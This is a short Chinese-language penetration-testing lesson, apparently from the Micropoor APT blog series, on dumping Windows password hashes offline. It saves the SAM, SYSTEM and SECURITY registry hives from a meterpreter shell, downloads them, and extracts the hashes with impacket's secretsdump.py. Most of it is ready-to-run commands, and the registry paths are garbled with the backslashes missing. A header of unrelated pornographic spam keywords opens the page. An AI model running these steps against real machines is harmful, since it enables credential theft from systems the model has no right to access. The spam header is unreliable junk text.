亚洲乱码一卡二卡四卡乱码新区_亚洲乱码中文字幕小综合_亚洲人成电影在线播放_亚洲性色AV一区二区三区_亚洲一区二区三区影院_亚洲中文字幕久久精品无码A_亚洲中文字幕无码专区_伊人热热久久原色播放WWW_在线观看AV永久免费_最新欧洲大片免费在线,欧美日韩成人三级免费看,久久黄色网址,欧美激情内射喷水高潮

第五十六課:離線提取目標(biāo)機(jī)hash
專注APT攻擊與防御
https://micropoor.blogspot.com/

很多環(huán)境下,不允許上傳或者使用mimikatz。而針對非域控的單機(jī)離線提取hash顯得尤為重要,。
在meterpreter shell命令切到交互式cmd命令,。
reg save 方式使得需要下載的目標(biāo)機(jī)hash文件更小。

reg save HKLMSYSTEM sys.hiv
reg save HKLMSAM sam.hiv
reg save hklmsecurity security.hiv
meterpreter下自帶download功能,。
離線提取:

本季用到的是impacket的 secretsdump.py,。Kali默認(rèn)路徑:/root/impacket/examples/secretsdump.py命令如下:
1 root@John:/tmp# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
Micropoor
?